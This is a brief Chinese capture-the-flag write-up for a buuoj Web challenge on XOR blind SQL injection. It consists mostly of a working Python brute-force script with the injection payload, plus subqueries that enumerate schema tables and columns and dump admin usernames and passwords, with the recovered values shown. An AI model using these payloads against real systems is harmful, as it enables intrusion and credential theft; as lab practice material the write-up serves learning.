[Black Watch 入群题]Web
知识点
异或盲注
解题
payloud如下:
import requests
import time
url= "http://f79b2611-fe64-45bb-ad8f-f31eb8f88179.node5.buuoj.cn:81/backend/content_detail.php?id=1"
flag= ""
for i in range(0,100):
for j in range(0,256):
payload = f"^if(ascii(substr(database(),{i},1))={j},3,0)"
txt = requests.get(url=url+payload)
time.sleep(0.1)
if '0xpoker' in txt.text:
flag+=chr(j)
print(flag)
##news database
##admin,content (select(group_concat(table_name))from(information_schema.tables)where(table_schema=database()))
##id,username,password,is_enable (select(group_concat(column_name))from(information_schema.columns)where(table_name=0x61646d696e))
## (select(group_concat(username))from(admin))
username:c238d0af,266a246e
password:bf0512b4,1b011309
除了有点慢,其他都还好。。